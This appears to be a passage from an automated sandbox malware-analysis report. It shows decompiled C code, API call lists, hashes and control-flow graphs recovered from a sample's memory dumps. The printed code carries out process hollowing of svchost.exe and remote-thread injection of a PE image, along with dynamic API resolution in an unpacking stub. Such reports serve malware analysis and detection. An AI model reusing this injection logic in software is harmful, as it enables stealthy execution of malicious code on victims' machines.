                                                                                                                                                                                                                                                                            							while(_v1104 < ( *(_v1096 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                            								if((_a8 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            									E04001310(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                            									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									E04001310(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0x14 + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                            									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v1104 = _v1104 + 1;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							E04001C00(_v12, _v1100);
                                                                                                                                                                                                                                                                            							_t140 = WriteProcessMemory(_v1012.hProcess, _v1100, _v12, _v8, 0); // executed
                                                                                                                                                                                                                                                                            							if(_t140 != 0) {
                                                                                                                                                                                                                                                                            								VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            								_v996.ContextFlags = 0x10007;
                                                                                                                                                                                                                                                                            								_t143 = GetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                            								if(_t143 != 0) {
                                                                                                                                                                                                                                                                            									_t145 = WriteProcessMemory(_v1012.hProcess, _v996.Ebx + 8,  &_v1100, 4, 0); // executed
                                                                                                                                                                                                                                                                            									if(_t145 != 0) {
                                                                                                                                                                                                                                                                            										_v996.Eax = _v1100 +  *((intOrPtr*)(_v1096 + 0x28));
                                                                                                                                                                                                                                                                            										_t148 = SetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                            										if(_t148 == 0) {
                                                                                                                                                                                                                                                                            											TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                            											CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                            											CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                            											goto L26;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										ResumeThread(_v1012.hThread); // executed
                                                                                                                                                                                                                                                                            										return _v1012.hProcess;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                            									CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                            									CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                            									return 0;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                            								CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                            								CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                            							CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                            							CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                            							VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t180 = VirtualAllocEx(_v1012.hProcess, 0, _v8, 0x103000, 0x40); // executed
                                                                                                                                                                                                                                                                            						_v1100 = _t180;
                                                                                                                                                                                                                                                                            						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                            							goto L10;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                            						CloseHandle(_v1012);
                                                                                                                                                                                                                                                                            						CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                            						VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                                                                            0x04001f8d
                                                                                                                                                                                                                                                                            0x040023d2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040023d2
                                                                                                                                                                                                                                                                            0x04001fa4
                                                                                                                                                                                                                                                                            0x04001fb6
                                                                                                                                                                                                                                                                            0x04001fc0
                                                                                                                                                                                                                                                                            0x04001fce
                                                                                                                                                                                                                                                                            0x04001fdf
                                                                                                                                                                                                                                                                            0x04001fdf
                                                                                                                                                                                                                                                                            0x04001ff0
                                                                                                                                                                                                                                                                            0x04002003
                                                                                                                                                                                                                                                                            0x04002008
                                                                                                                                                                                                                                                                            0x0400200b
                                                                                                                                                                                                                                                                            0x0400201e
                                                                                                                                                                                                                                                                            0x04002038
                                                                                                                                                                                                                                                                            0x04002047
                                                                                                                                                                                                                                                                            0x04002057
                                                                                                                                                                                                                                                                            0x0400205d
                                                                                                                                                                                                                                                                            0x04002064
                                                                                                                                                                                                                                                                            0x04002090
                                                                                                                                                                                                                                                                            0x04002098
                                                                                                                                                                                                                                                                            0x040020ce
                                                                                                                                                                                                                                                                            0x040020d4
                                                                                                                                                                                                                                                                            0x040020e1
                                                                                                                                                                                                                                                                            0x0400214d
                                                                                                                                                                                                                                                                            0x0400215f
                                                                                                                                                                                                                                                                            0x04002164
                                                                                                                                                                                                                                                                            0x04002167
                                                                                                                                                                                                                                                                            0x04002182
                                                                                                                                                                                                                                                                            0x0400219e
                                                                                                                                                                                                                                                                            0x0400222e
                                                                                                                                                                                                                                                                            0x04002233
                                                                                                                                                                                                                                                                            0x040021a0
                                                                                                                                                                                                                                                                            0x040021e2
                                                                                                                                                                                                                                                                            0x040021e7
                                                                                                                                                                                                                                                                            0x040021e7
                                                                                                                                                                                                                                                                            0x0400217c
                                                                                                                                                                                                                                                                            0x0400217c
                                                                                                                                                                                                                                                                            0x04002246
                                                                                                                                                                                                                                                                            0x04002266
                                                                                                                                                                                                                                                                            0x0400226e
                                                                                                                                                                                                                                                                            0x040022bc
                                                                                                                                                                                                                                                                            0x040022c2
                                                                                                                                                                                                                                                                            0x040022da
                                                                                                                                                                                                                                                                            0x040022e2
                                                                                                                                                                                                                                                                            0x04002330
                                                                                                                                                                                                                                                                            0x04002338
                                                                                                                                                                                                                                                                            0x04002376
                                                                                                                                                                                                                                                                            0x0400238a
                                                                                                                                                                                                                                                                            0x04002392
                                                                                                                                                                                                                                                                            0x040023b2
                                                                                                                                                                                                                                                                            0x040023bf
                                                                                                                                                                                                                                                                            0x040023cc
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040023cc
                                                                                                                                                                                                                                                                            0x0400239b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040023a1
                                                                                                                                                                                                                                                                            0x04002343
                                                                                                                                                                                                                                                                            0x04002350
                                                                                                                                                                                                                                                                            0x0400235d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04002363
                                                                                                                                                                                                                                                                            0x040022ed
                                                                                                                                                                                                                                                                            0x040022fa
                                                                                                                                                                                                                                                                            0x04002307
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0400230d
                                                                                                                                                                                                                                                                            0x04002279
                                                                                                                                                                                                                                                                            0x04002286
                                                                                                                                                                                                                                                                            0x04002293
                                                                                                                                                                                                                                                                            0x040022a4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040022aa
                                                                                                                                                                                                                                                                            0x040020f7
                                                                                                                                                                                                                                                                            0x040020fd
                                                                                                                                                                                                                                                                            0x0400210a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04002115
                                                                                                                                                                                                                                                                            0x04002122
                                                                                                                                                                                                                                                                            0x0400212f
                                                                                                                                                                                                                                                                            0x04002140
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04002146
                                                                                                                                                                                                                                                                            0x040020a5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04002066
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04002066

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 04001FA4
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,\system32\svchost.exe), ref: 04001FB6
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,0400317C), ref: 04001FCE
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00000000), ref: 04001FDF
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04002057
                                                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 04002090
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040020A5
                                                                                                                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 040020CE
                                                                                                                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,00000000,?,00103000,00000040), ref: 040020F7
                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 04002115
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 04002122
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0400212F
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002140
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                                            • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                                                                                                            • API String ID: 1819736980-1559310322
                                                                                                                                                                                                                                                                            • Opcode ID: 036fed23e7ee821a2f18e3afc8e3bbde1b7bb66371f9036d2a87dc4e59fe086b
                                                                                                                                                                                                                                                                            • Instruction ID: 1d4488b5fdb617a131862b70200c6806e4887f475a197b4823290bb3b9e97252
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 036fed23e7ee821a2f18e3afc8e3bbde1b7bb66371f9036d2a87dc4e59fe086b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07D13EB1A00215ABDB29CF54DC94FAEB7B9FB48704F0485D8F709A7280D678AE80CF55
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E04001DC0(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				long _v28;
                                                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                                                                            				int _t85;
                                                                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                                                                            				void* _t138;
                                                                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
                                                                                                                                                                                                                                                                            					_v20 = _v24 + ( *(_v24 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                            					_v12 =  *((intOrPtr*)(_v24 + 0x50));
                                                                                                                                                                                                                                                                            					_t75 = VirtualAlloc(0, _v12, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                            					_v16 = _t75;
                                                                                                                                                                                                                                                                            					if(_v16 != 0) {
                                                                                                                                                                                                                                                                            						_t78 = VirtualAllocEx(_a4,  *(_v24 + 0x34), _v12, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                            						_v32 = _t78;
                                                                                                                                                                                                                                                                            						if(_v32 != 0) {
                                                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                                                            							E04001310(_v16, _a8,  *((intOrPtr*)(_v24 + 0x54)));
                                                                                                                                                                                                                                                                            							_t139 = _t138 + 0xc;
                                                                                                                                                                                                                                                                            							_v36 = 0;
                                                                                                                                                                                                                                                                            							while(_v36 < ( *(_v24 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                            								E04001310(_v16 +  *((intOrPtr*)(_v20 + 0xc + _v36 * 0x28)), _a8 +  *((intOrPtr*)(_v20 + 0x14 + _v36 * 0x28)),  *((intOrPtr*)(_v20 + 0x10 + _v36 * 0x28)));
                                                                                                                                                                                                                                                                            								_t139 = _t139 + 0xc;
                                                                                                                                                                                                                                                                            								_v36 = _v36 + 1;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							E04001C00(_v16, _v32);
                                                                                                                                                                                                                                                                            							_t85 = WriteProcessMemory(_a4, _v32, _v16, _v12, 0); // executed
                                                                                                                                                                                                                                                                            							if(_t85 != 0) {
                                                                                                                                                                                                                                                                            								VirtualFree(_v16, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            								_v28 = 0;
                                                                                                                                                                                                                                                                            								_t90 = CreateRemoteThread(_a4, 0, 0, _v32 +  *((intOrPtr*)(_v24 + 0x28)), 0x11, 0,  &_v28); // executed
                                                                                                                                                                                                                                                                            								_v8 = _t90;
                                                                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v32 = VirtualAllocEx(_a4, 0, _v12, 0x103000, 0x40);
                                                                                                                                                                                                                                                                            						if(_v32 != 0) {
                                                                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                                                            0x04001dc6
                                                                                                                                                                                                                                                                            0x04001dd1
                                                                                                                                                                                                                                                                            0x04001f72
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001de1
                                                                                                                                                                                                                                                                            0x04001dea
                                                                                                                                                                                                                                                                            0x04001dfb
                                                                                                                                                                                                                                                                            0x04001e04
                                                                                                                                                                                                                                                                            0x04001e14
                                                                                                                                                                                                                                                                            0x04001e1a
                                                                                                                                                                                                                                                                            0x04001e21
                                                                                                                                                                                                                                                                            0x04001e40
                                                                                                                                                                                                                                                                            0x04001e46
                                                                                                                                                                                                                                                                            0x04001e4d
                                                                                                                                                                                                                                                                            0x04001e87
                                                                                                                                                                                                                                                                            0x04001e96
                                                                                                                                                                                                                                                                            0x04001e9b
                                                                                                                                                                                                                                                                            0x04001e9e
                                                                                                                                                                                                                                                                            0x04001eb0
                                                                                                                                                                                                                                                                            0x04001eec
                                                                                                                                                                                                                                                                            0x04001ef1
                                                                                                                                                                                                                                                                            0x04001ead
                                                                                                                                                                                                                                                                            0x04001ead
                                                                                                                                                                                                                                                                            0x04001efe
                                                                                                                                                                                                                                                                            0x04001f18
                                                                                                                                                                                                                                                                            0x04001f20
                                                                                                                                                                                                                                                                            0x04001f42
                                                                                                                                                                                                                                                                            0x04001f48
                                                                                                                                                                                                                                                                            0x04001f69
                                                                                                                                                                                                                                                                            0x04001f6f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001f6f
                                                                                                                                                                                                                                                                            0x04001f2d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001f33
                                                                                                                                                                                                                                                                            0x04001e66
                                                                                                                                                                                                                                                                            0x04001e6d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001e7a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001e80
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001e23

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 04001E14
                                                                                                                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(00000000,?,00000000,00003000,00000040), ref: 04001E40
                                                                                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 04001E60
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04001E7A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3668210933-0
                                                                                                                                                                                                                                                                            • Opcode ID: 52cf3d6ea764938bff9b522e6c342b7d46ced791a51747c70ce413cfb71456e5
                                                                                                                                                                                                                                                                            • Instruction ID: 690ccb563e0dd82574d8c7baf9c5524f022716bcc7e01862e985cdb9dd94f491
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52cf3d6ea764938bff9b522e6c342b7d46ced791a51747c70ce413cfb71456e5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B451FAB5E00209AFDB04CF94C895FAEB7B5FB48704F10C558FA05BB280D779AA41CBA0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 132 401005-40107e LoadLibraryExA GetProcAddress call 401126 137 401083-401099 GetPEB 132->137
                                                                                                                                                                                                                                                                            C-Code - Quality: 25%
                                                                                                                                                                                                                                                                            			E00401005() {
                                                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_pop(_t42);
                                                                                                                                                                                                                                                                            				_t43 = _t42 - 5;
                                                                                                                                                                                                                                                                            				_t1 = _t43 + 0x85; // 0x401085
                                                                                                                                                                                                                                                                            				_t20 =  *_t1();
                                                                                                                                                                                                                                                                            				_t2 = _t43 + 0x29ab9; // 0x42aab9
                                                                                                                                                                                                                                                                            				_t3 = _t43 + 0x9a; // 0x40109a
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t43 + 0x29af1)) =  *_t3(_t20, _t2);
                                                                                                                                                                                                                                                                            				_t5 = _t43 + 0x29ac8; // 0x42aac8
                                                                                                                                                                                                                                                                            				 *(_t43 + 0x29af5) = LoadLibraryExA(_t5, 0, 0);
                                                                                                                                                                                                                                                                            				_t8 = _t43 + 0x29ad5; // 0x42aad5
                                                                                                                                                                                                                                                                            				_t9 = _t43 + 0x29af5; // 0x74640000
                                                                                                                                                                                                                                                                            				_t10 = _t43 + 0x9a; // 0x40109a
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t43 + 0x29af9)) =  *_t10( *_t9, _t8);
                                                                                                                                                                                                                                                                            				_t12 = _t43 + 0x29ae4; // 0x42aae4
                                                                                                                                                                                                                                                                            				_t13 = _t43 + 0x29af5; // 0x74640000
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t43 + 0x29afd)) = GetProcAddress( *_t13, _t12);
                                                                                                                                                                                                                                                                            				_t16 = _t43 + 0x2b9; // 0x4012b9
                                                                                                                                                                                                                                                                            				E00401126(_t16, _t43); // executed
                                                                                                                                                                                                                                                                            				asm("lodsd");
                                                                                                                                                                                                                                                                            				return  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 8));
                                                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                                                            0x00401005
                                                                                                                                                                                                                                                                            0x00401006
                                                                                                                                                                                                                                                                            0x0040100c
                                                                                                                                                                                                                                                                            0x00401012
                                                                                                                                                                                                                                                                            0x00401014
                                                                                                                                                                                                                                                                            0x0040101c
                                                                                                                                                                                                                                                                            0x00401024
                                                                                                                                                                                                                                                                            0x0040102a
                                                                                                                                                                                                                                                                            0x0040103b
                                                                                                                                                                                                                                                                            0x00401041
                                                                                                                                                                                                                                                                            0x00401048
                                                                                                                                                                                                                                                                            0x0040104e
                                                                                                                                                                                                                                                                            0x00401056
                                                                                                                                                                                                                                                                            0x0040105c
                                                                                                                                                                                                                                                                            0x00401063
                                                                                                                                                                                                                                                                            0x00401070
                                                                                                                                                                                                                                                                            0x00401077
                                                                                                                                                                                                                                                                            0x0040107e
                                                                                                                                                                                                                                                                            0x00401094
                                                                                                                                                                                                                                                                            0x00401099

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNELBASE(kernel32.dll,00000000,00000000), ref: 00401035
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74640000,VirtualAlloc), ref: 0040106A
                                                                                                                                                                                                                                                                              • Part of subcall function 00401126: VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00401144
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.811523812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressAllocLibraryLoadProcVirtual
                                                                                                                                                                                                                                                                            • String ID: GetProcAddress$LoadLibraryExA$VirtualAlloc$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 4074058790-1482053243
                                                                                                                                                                                                                                                                            • Opcode ID: bfa598e39201ea56365d01237002b764d44595e1bff33a7ec6927efc10a0c0ef
                                                                                                                                                                                                                                                                            • Instruction ID: 4ff399170a710021cd26f301060e842f1d9714487b9385cbdeed3e88436b29f7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfa598e39201ea56365d01237002b764d44595e1bff33a7ec6927efc10a0c0ef
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C701937264038D9FDB72DFA4CC84FDA37A9EF48300F014532E90DCBA50E675AA048B96
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 161 408bf20-408bf2d 162 408bf3a-408bf3f 161->162 163 408bf41 162->163 164 408bf30-408bf35 163->164 165 408bf43 163->165 166 408bf36-408bf38 164->166 167 408bf48-408bf4a 165->167 166->162 166->163 168 408bf4c-408bf51 167->168 169 408bf53-408bf57 167->169 168->169 170 408bf59 169->170 171 408bf64-408bf67 169->171 174 408bf5b-408bf62 170->174 175 408bf83-408bf88 170->175 172 408bf69-408bf6e 171->172 173 408bf70-408bf72 171->173 172->173 173->167 174->171 174->175 176 408bf8a-408bf93 175->176 177 408bf9b-408bf9d 175->177 178 408c00a-408c00d 176->178 179 408bf95-408bf99 176->179 180 408bf9f-408bfa4 177->180 181 408bfa6 177->181 182 408c012-408c015 178->182 179->181 180->181 183 408bfa8-408bfab 181->183 184 408bf74-408bf76 181->184 187 408c017-408c019 182->187 188 408bfad-408bfb2 183->188 189 408bfb4 183->189 185 408bf78-408bf7d 184->185 186 408bf7f-408bf81 184->186 185->186 190 408bfd5-408bfe4 186->190 187->182 191 408c01b-408c01e 187->191 188->189 189->184 192 408bfb6-408bfb8 189->192 193 408bff4-408c001 190->193 194 408bfe6-408bfed 190->194 191->182 195 408c020-408c03c 191->195 196 408bfba-408bfbf 192->196 197 408bfc1-408bfc5 192->197 193->193 200 408c003-408c005 193->200 194->194 199 408bfef 194->199 195->187 201 408c03e 195->201 196->197 197->192 198 408bfc7 197->198 202 408bfc9-408bfd0 198->202 203 408bfd2 198->203 199->166 200->166 204 408c044-408c048 201->204 202->192 202->203 203->190 205 408c04a-408c060 LoadLibraryA 204->205 206 408c08f-408c092 204->206 207 408c061-408c066 205->207 208 408c095-408c09c 206->208 207->204 209 408c068-408c06a 207->209 210 408c09e-408c0a0 208->210 211 408c0c0-408c0f0 VirtualProtect * 2 208->211 212 408c06c-408c072 209->212 213 408c073-408c080 GetProcAddress 209->213 214 408c0a2-408c0b1 210->214 215 408c0b3-408c0be 210->215 216 408c0f4-408c0f8 211->216 212->213 217 408c089 ExitProcess 213->217 218 408c082-408c087 213->218 214->208 215->214 216->216 219 408c0fa 216->219 218->207
                                                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                                                            			_entry_() {
                                                                                                                                                                                                                                                                            				char _v128;
                                                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                                                            				signed int _v408;
                                                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v412;
                                                                                                                                                                                                                                                                            				signed int _v416;
                                                                                                                                                                                                                                                                            				signed int _v420;
                                                                                                                                                                                                                                                                            				void* _v424;
                                                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v428;
                                                                                                                                                                                                                                                                            				signed int _v432;
                                                                                                                                                                                                                                                                            				void* _v436;
                                                                                                                                                                                                                                                                            				void* _v440;
                                                                                                                                                                                                                                                                            				void* _v444;
                                                                                                                                                                                                                                                                            				void _t72;
                                                                                                                                                                                                                                                                            				int _t73;
                                                                                                                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                                                                                                                            				void _t75;
                                                                                                                                                                                                                                                                            				void _t76;
                                                                                                                                                                                                                                                                            				signed int _t78;
                                                                                                                                                                                                                                                                            				signed int _t79;
                                                                                                                                                                                                                                                                            				unsigned int _t80;
                                                                                                                                                                                                                                                                            				signed int _t90;
                                                                                                                                                                                                                                                                            				signed char* _t95;
                                                                                                                                                                                                                                                                            				long _t96;
                                                                                                                                                                                                                                                                            				char* _t99;
                                                                                                                                                                                                                                                                            				signed int _t100;
                                                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                                                            				signed int _t103;
                                                                                                                                                                                                                                                                            				signed int _t106;
                                                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t108;
                                                                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                                                                            				void* _t117;
                                                                                                                                                                                                                                                                            				signed int _t136;
                                                                                                                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                                                                                                                            				signed int _t140;
                                                                                                                                                                                                                                                                            				signed int _t141;
                                                                                                                                                                                                                                                                            				intOrPtr* _t144;
                                                                                                                                                                                                                                                                            				signed int* _t146;
                                                                                                                                                                                                                                                                            				signed int _t147;
                                                                                                                                                                                                                                                                            				void* _t160;
                                                                                                                                                                                                                                                                            				signed int _t164;
